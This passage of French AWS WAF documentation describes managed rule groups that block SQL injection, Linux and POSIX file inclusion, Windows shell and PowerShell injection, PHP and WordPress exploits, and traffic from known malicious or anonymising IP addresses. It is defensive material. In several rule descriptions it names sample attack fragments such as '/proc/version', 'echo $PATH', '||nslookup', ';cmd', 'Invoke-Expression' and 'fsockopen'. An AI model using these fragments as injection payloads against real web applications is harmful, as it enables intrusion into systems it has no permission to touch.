Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles Base de données SQL contient des règles pour bloquer les modèles de demande associés à l'exploitation des bases de données SQL, comme les attaques par injection SQL. Cela peut aider à empêcher l'injection à distance de requêtes non autorisées. Évaluez ce groupe de règles pour l'utiliser si votre application s'interface avec une base de données SQL.

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| SQLi\$1QUERYARGUMENTS |  Utilise le paramètre intégré AWS WAF [Instruction d'attaque par injection SQL de règle](waf-rule-statement-type-sqli-match.md), avec un niveau de sensibilité défini surLow, pour inspecter les valeurs de tous les paramètres de requête afin de détecter des modèles correspondant à du code SQL malveillant.  Action de la règle Block Libellé : `awswaf:managed:aws:sql-database:SQLi_QueryArguments`  | 
| SQLiExtendedPatterns\$1QUERYARGUMENTS |  Inspecte les valeurs de tous les paramètres de la demande pour les modèles qui correspondent au code SQL malveillant. Les modèles détectés par cette règle ne sont pas couverts par la règle`SQLi_QUERYARGUMENTS`.  Action de la règle Block Libellé : `awswaf:managed:aws:sql-database:SQLiExtendedPatterns_QueryArguments`  | 
| SQLi\$1BODY |  Utilise le paramètre intégré AWS WAF [Instruction d'attaque par injection SQL de règle](waf-rule-statement-type-sqli-match.md), avec un niveau de sensibilité défini surLow, pour inspecter le corps de la demande afin de détecter des modèles correspondant à du code SQL malveillant.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:sql-database:SQLi_Body`  | 
| SQLiExtendedPatterns\$1BODY |  Inspecte le corps de la demande pour détecter les modèles correspondant à du code SQL malveillant. Les modèles détectés par cette règle ne sont pas couverts par la règle`SQLi_BODY`.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:sql-database:SQLiExtendedPatterns_Body`  | 
| SQLi\$1COOKIE |  Utilise le paramètre intégré AWS WAF [Instruction d'attaque par injection SQL de règle](waf-rule-statement-type-sqli-match.md), avec un niveau de sensibilité défini surLow, pour inspecter les en-têtes des cookies de demande afin de détecter des modèles correspondant à du code SQL malveillant.  Action de la règle Block Libellé : `awswaf:managed:aws:sql-database:SQLi_Cookie`  | 
| SQLi\$1URIPATH |  Utilise le paramètre intégré AWS WAF [Instruction d'attaque par injection SQL de règle](waf-rule-statement-type-sqli-match.md), avec un niveau de sensibilité défini surLow, pour inspecter les en-têtes des cookies de demande afin de détecter des modèles correspondant à du code SQL malveillant.  Action de la règle Block Libellé : `awswaf:managed:aws:sql-database:SQLi_URIPath`  | 

## Groupe de règles géré par le système d'exploitation Linux
<a name="aws-managed-rule-groups-use-case-linux-os"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesLinuxRuleSet`, WCU : 200

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles du système d'exploitation Linux contient des règles qui bloquent les modèles de demande associés à l'exploitation de vulnérabilités spécifiques à Linux, y compris les attaques LFI (Local File Inclusion) propres à Linux. Cela peut aider à prévenir les attaques qui exposent le contenu des fichiers ou exécutent du code auquel l'attaquant n'aurait pas dû avoir accès. Vous devez évaluer ce groupe de règles si une partie de votre application s'exécute sous Linux. Vous devez utiliser ce groupe de règles conjointement avec le groupe de règles [Système d'exploitation POSIX](#aws-managed-rule-groups-use-case-posix-os).

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| LFI\$1URIPATH |  Inspecte le chemin de la demane pour les tentatives d'exploitation des vulnérabilités LFI (Local File Inclusion) dans les applications Web. Les exemples de modèles incluent des fichiers comme `/proc/version`, qui pourraient fournir des informations sur le système d'exploitation aux attaquants.  Action de la règle Block Libellé : `awswaf:managed:aws:linux-os:LFI_URIPath`  | 
| LFI\$1QUERYSTRING |  Inspecte les valeurs de la chaîne de requête pour détecter les tentatives d'exploitation des vulnérabilités d'inclusion de fichiers locaux (LFI) dans les applications Web. Les exemples de modèles incluent des fichiers comme `/proc/version`, qui pourraient fournir des informations sur le système d'exploitation aux attaquants.  Action de la règle Block Libellé : `awswaf:managed:aws:linux-os:LFI_QueryString`  | 
| LFI\$1HEADER |  Inspecte les en-têtes des demandes pour détecter toute tentative d'exploitation des vulnérabilités d'inclusion de fichiers locaux (LFI) dans les applications Web. Les exemples de modèles incluent des fichiers comme `/proc/version`, qui pourraient fournir des informations sur le système d'exploitation aux attaquants.  Cette règle inspecte uniquement les 8 premiers Ko des en-têtes de demande ou les 200 premiers en-têtes, selon la première limite atteinte, et utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:linux-os:LFI_Header`  | 

## Groupe de règles géré par le système d'exploitation POSIX
<a name="aws-managed-rule-groups-use-case-posix-os"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesUnixRuleSet`, WCU : 100

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles Système d'exploitation POSIX contient des règles qui bloquent les modèles de demande associés à l'exploitation de vulnérabilités spécifiques aux systèmes d'exploitation POSIX et apparentés, y compris les attaques LFI (Local File Inclusion). Cela peut aider à prévenir les attaques qui exposent le contenu des fichiers ou exécutent du code auquel l'attaquant n'aurait pas dû avoir accès. Vous devez évaluer ce groupe de règles si une partie de votre application s'exécute sur un système d'exploitation POSIX ou apparenté, y compris Linux, AIX, HP-UX, macOS, Solaris, FreeBSD, OpenBSD et bien d'autres. 

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| UNIXShellCommandsVariables\$1QUERYSTRING |  Inspecte les valeurs de la chaîne de requête pour détecter toute tentative d'exploitation des vulnérabilités liées à l'injection de commandes, au LFI et à la traversée de chemins dans les applications Web exécutées sur des systèmes Unix. Les exemples incluent des modèles comme `echo $HOME` et `echo $PATH`.  Action de la règle Block Libellé : `awswaf:managed:aws:posix-os:UNIXShellCommandsVariables_QueryString`  | 
| UNIXShellCommandsVariables\$1BODY |  Inspecte le corps de la requête pour les tentatives d'exploitation des vulnérabilités d'injection de commandes, de LFI et de traversée de chemin dans les applications Web qui s'exécutent sur des systèmes Unix. Les exemples incluent des modèles comme `echo $HOME` et `echo $PATH`.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:posix-os:UNIXShellCommandsVariables_Body`  | 
| UNIXShellCommandsVariables\$1HEADER |  Inspecte tous les en-têtes de requêtes pour détecter toute tentative d'exploitation des vulnérabilités liées à l'injection de commandes, au LFI et à la traversée de chemins dans les applications Web exécutées sur des systèmes Unix. Les exemples incluent des modèles comme `echo $HOME` et `echo $PATH`.  Cette règle inspecte uniquement les 8 premiers Ko des en-têtes de demande ou les 200 premiers en-têtes, selon la première limite atteinte, et utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:posix-os:UNIXShellCommandsVariables_Header`  | 

## Groupe de règles géré par le système d'exploitation Windows
<a name="aws-managed-rule-groups-use-case-windows-os"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesWindowsRuleSet`, WCU : 200

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles du système d'exploitation Windows contient des règles qui bloquent les modèles de demandes associés à l'exploitation de vulnérabilités spécifiques à Windows, telles que l'exécution à distance de PowerShell commandes. Cela permet d'empêcher l'exploitation de vulnérabilités qui permettent à un attaquant d'exécuter des commandes non autorisées ou d'exécuter du code malveillant. Évaluez ce groupe de règles si une partie de votre application s'exécute sur un système d'exploitation Windows.

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| WindowsShellCommands\$1COOKIE |  Inspecte les en-têtes des cookies de demande pour détecter les tentatives d'injection de WindowsShell commandes dans les applications Web. Les modèles de correspondance représentent des WindowsShell commandes. Les exemples de modèles incluent `\|\|nslookup` et`;cmd`.  Action de la règle Block Libellé : `awswaf:managed:aws:windows-os:WindowsShellCommands_Cookie`   | 
| WindowsShellCommands\$1QUERYARGUMENTS |  Inspecte les valeurs de tous les paramètres de requête pour détecter les tentatives d'injection de WindowsShell commandes dans les applications Web. Les modèles de correspondance représentent des WindowsShell commandes. Les exemples de modèles incluent `\|\|nslookup` et`;cmd`.  Action de la règle Block Libellé : `awswaf:managed:aws:windows-os:WindowsShellCommands_QueryArguments`   | 
| WindowsShellCommands\$1BODY |  Inspecte le corps de la requête pour détecter les tentatives d'injection de WindowsShell commandes dans les applications Web. Les modèles de correspondance représentent des WindowsShell commandes. Les exemples de modèles incluent `\|\|nslookup` et`;cmd`.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:windows-os:WindowsShellCommands_Body`   | 
| PowerShellCommands\$1COOKIE |  Inspecte les en-têtes des cookies de demande pour détecter les tentatives d'injection de PowerShell commandes dans les applications Web. Les modèles de correspondance représentent des PowerShell commandes. Par exemple, `Invoke-Expression`.  Action de la règle Block Libellé : `awswaf:managed:aws:windows-os:PowerShellCommands_Cookie`  | 
| PowerShellCommands\$1QUERYARGUMENTS |  Inspecte les valeurs de tous les paramètres de requête pour détecter les tentatives d'injection de PowerShell commandes dans les applications Web. Les modèles de correspondance représentent des PowerShell commandes. Par exemple, `Invoke-Expression`.  Action de la règle Block Libellé : `awswaf:managed:aws:windows-os:PowerShellCommands_QueryArguments`  | 
| PowerShellCommands\$1BODY |  Inspecte le corps de la requête pour détecter les tentatives d'injection de PowerShell commandes dans les applications Web. Les modèles de correspondance représentent des PowerShell commandes. Par exemple, `Invoke-Expression`.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:windows-os:PowerShellCommands_Body`   | 

## Groupe de règles géré par une application PHP
<a name="aws-managed-rule-groups-use-case-php-app"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesPHPRuleSet`, WCU : 100

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles Application PHP contient des règles qui bloquent les modèles de demande associés à l'exploitation de vulnérabilités spécifiques à l'utilisation du langage de programmation PHP, y compris l'injection de fonctions PHP dangereuses. Cela permet d'empêcher l'exploitation de vulnérabilités qui permettent à un attaquant d'exécuter à distance du code ou des commandes pour lesquels il n'est pas autorisé. Évaluez ce groupe de règles si PHP est installé sur un serveur avec lequel votre application s'interface.

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| PHPHighRiskMethodsVariables\$1HEADER |  Inspecte tous les en-têtes pour détecter les tentatives d'injection de code de script PHP. Les exemples de modèles incluent des fonctions comme `fsockopen` et la variable `$_GET` superglobale.  Cette règle inspecte uniquement les 8 premiers Ko des en-têtes de demande ou les 200 premiers en-têtes, selon la première limite atteinte, et utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:php-app:PHPHighRiskMethodsVariables_Header`  | 
| PHPHighRiskMethodsVariables\$1QUERYSTRING |  Inspecte tout ce qui se trouve après le premier élément `?` de l'URL de requête, à la recherche de tentatives d'injection de code dans un script PHP. Les exemples de modèles incluent des fonctions comme `fsockopen` et la variable `$_GET` superglobale.  Action de la règle Block Libellé : `awswaf:managed:aws:php-app:PHPHighRiskMethodsVariables_QueryString`  | 
| PHPHighRiskMethodsVariables\$1BODY |  Inspecte les valeurs du corps de la demande pour les tentatives d'injection de code PHP. Les exemples de modèles incluent des fonctions comme `fsockopen` et la variable `$_GET` superglobale.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:php-app:PHPHighRiskMethodsVariables_Body`  | 
| PHPHighRiskMethodsVariables\$1URIPATH |  Inspecte le chemin de requête pour détecter les tentatives d'injection de code de script PHP. Les exemples de modèles incluent des fonctions comme `fsockopen` et la variable `$_GET` superglobale.  Action de la règle Block Libellé : `awswaf:managed:aws:php-app:PHPHighRiskMethodsVariables_URIPath`  | 

## WordPress groupe de règles géré par les applications
<a name="aws-managed-rule-groups-use-case-wordpress-app"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesWordPressRuleSet`, WCU : 100

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles d' WordPress application contient des règles qui bloquent les modèles de demandes associés à l'exploitation de vulnérabilités spécifiques aux WordPress sites. Vous devez évaluer ce groupe de règles si vous courezWordPress. Ce groupe de règles doit être utilisé conjointement avec les groupes de règles [Base de données SQL](#aws-managed-rule-groups-use-case-sql-db) et [Application PHP](#aws-managed-rule-groups-use-case-php-app).

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| WordPressExploitableCommands\$1QUERYSTRING |  Inspecte la chaîne de requête pour détecter les WordPress commandes à haut risque susceptibles d'être exploitées dans des installations ou des plugins vulnérables. Les exemples de modèles incluent des commandes comme `do-reset-wordpress`.  Action de la règle Block Libellé : `awswaf:managed:aws:wordpress-app:WordPressExploitableCommands_QUERYSTRING`  | 
| WordPressExploitablePaths\$1URIPATH |  Inspecte le chemin de l'URI de la demande pour WordPress les fichiers tels que`xmlrpc.php`, connus pour présenter des vulnérabilités facilement exploitables.  Action de la règle Block Libellé : `awswaf:managed:aws:wordpress-app:WordPressExploitablePaths_URIPATH`  | 

# Groupes de règles de réputation IP
<a name="aws-managed-rule-groups-ip-rep"></a>

Les groupes de règles de réputation IP bloquent les demandes en fonction de leur adresse IP source. 

**Note**  
Ces règles utilisent l'adresse IP source à partir de l'origine de la requête Web. Si le trafic passe par un ou plusieurs proxys ou équilibreurs de charge, l'origine de la requête Web contiendra l'adresse du dernier proxy, et non l'adresse d'origine du client. 

Choisissez un ou plusieurs de ces groupes de règles si vous souhaitez réduire votre exposition au trafic de robot, aux tentatives d'exploitation ou si vous appliquez des restrictions géographiques à votre contenu. Pour la gestion des bots, voir également[AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md).

Les groupes de règles de cette catégorie ne fournissent pas de notifications de version ni de mise à jour SNS. 

## Groupe de règles géré par Amazon IP Reputation
<a name="aws-managed-rule-groups-ip-rep-amazon"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesAmazonIpReputationList`, WCU : 25

**Note**  
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles de la liste de réputation IP Amazon contient des règles basées sur les renseignements internes sur les menaces Amazon. Ceci est utile si vous souhaitez bloquer les adresses IP généralement associées à des robots ou à d'autres menaces. Le blocage de ces adresses IP peut aider à atténuer les robots et à réduire le risque qu'un acteur malveillant ne découvre une application vulnérable.

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| AWSManagedIPReputationList |  Inspecte les adresses IP identifiées comme participant activement à des activités malveillantes. AWS WAF collecte la liste d'adresses IP auprès de diverses sources MadPot, notamment d'un outil de renseignement sur les menaces utilisé par Amazon pour protéger ses clients contre la cybercriminalité. Pour plus d'informations sur MadPot, voir[https://www.aboutamazon.com/news/aws/amazon-madpot-stops-cybersecurity-crime](https://www.aboutamazon.com/news/aws/amazon-madpot-stops-cybersecurity-crime). Action de la règle Block Libellé : `awswaf:managed:aws:amazon-ip-list:AWSManagedIPReputationList`  | 
| AWSManagedReconnaissanceList |  Inspecte les connexions provenant d'adresses IP qui effectuent une reconnaissance par rapport aux AWS ressources.  Action de la règle Block Libellé : `awswaf:managed:aws:amazon-ip-list:AWSManagedReconnaissanceList`  | 
| AWSManagedIPDDoSList |  Inspecte les adresses IP qui ont été identifiées comme participant activement aux activités DDo S.  Action de la règle Count Libellé : `awswaf:managed:aws:amazon-ip-list:AWSManagedIPDDoSList`  | 

## Groupe de règles géré par liste d'adresses IP anonyme
<a name="aws-managed-rule-groups-ip-rep-anonymous"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesAnonymousIpList`, WCU : 50

**Note**  
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles de liste d'adresses IP anonymes contient des règles visant à bloquer les demandes provenant de services qui permettent de masquer l'identité du téléspectateur. Il s'agit notamment des requêtes provenant de proxysVPNs, de nœuds Tor et de fournisseurs d'hébergement Web. Ce groupe de règles est utile si vous souhaitez filtrer les utilisateurs qui tentent de masquer leur identité auprès de votre application. Le blocage des adresses IP liées à ces services peut contribuer à limiter les robots et le non-respect des restrictions géographiques.

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| AnonymousIPList |  Inspecte la liste des adresses IP des sources connues pour anonymiser les informations client, telles que les nœuds TOR, les proxys temporaires et d'autres services de masquage.  Action de la règle Block Libellé : `awswaf:managed:aws:anonymous-ip-list:AnonymousIPList`  | 
| HostingProviderIPList | Recherche une liste d'adresses IP provenant de fournisseurs d'hébergement Web et de cloud, qui sont moins susceptibles de générer du trafic pour les utilisateurs finaux. La liste IP n'inclut pas les adresses AWS IP. Action de la règle Block Libellé : `awswaf:managed:aws:anonymous-ip-list:HostingProviderIPList` | 

# AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes
<a name="aws-managed-rule-groups-acfp"></a>

Cette section explique ce que fait le AWS WAF groupe de règles géré par Fraud Control pour la création de comptes et la prévention des fraudes (ACFP).

VendorName:`AWS`, Nom :`AWSManagedRulesACFPRuleSet`, WCU : 50

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

L'ACFP ( AWS WAF Fraud Control Account Creation Fraud Prevention) gère les étiquettes des groupes de règles et gère les demandes susceptibles de faire partie de tentatives de création de compte frauduleuses. Pour ce faire, le groupe de règles inspecte les demandes de création de compte que les clients envoient aux points de terminaison d'enregistrement et de création de compte de votre application. 

Le groupe de règles ACFP inspecte les tentatives de création de comptes de différentes manières, afin de vous donner de la visibilité et de contrôler les interactions potentiellement malveillantes. Le groupe de règles utilise des jetons de demande pour recueillir des informations sur le navigateur du client et sur le niveau d'interactivité humaine lors de la création de la demande de création de compte. Le groupe de règles détecte et gère les tentatives de création de comptes en masse en agrégeant les demandes par adresse IP et par session client, et en les agrégeant selon les informations de compte fournies, telles que l'adresse physique et le numéro de téléphone. En outre, le groupe de règles détecte et bloque la création de nouveaux comptes à l'aide d'informations d'identification compromises, ce qui contribue à protéger le niveau de sécurité de votre application et de vos nouveaux utilisateurs. 

## Considérations relatives à l'utilisation de ce groupe de règles
<a name="aws-managed-rule-groups-acfp-using"></a>

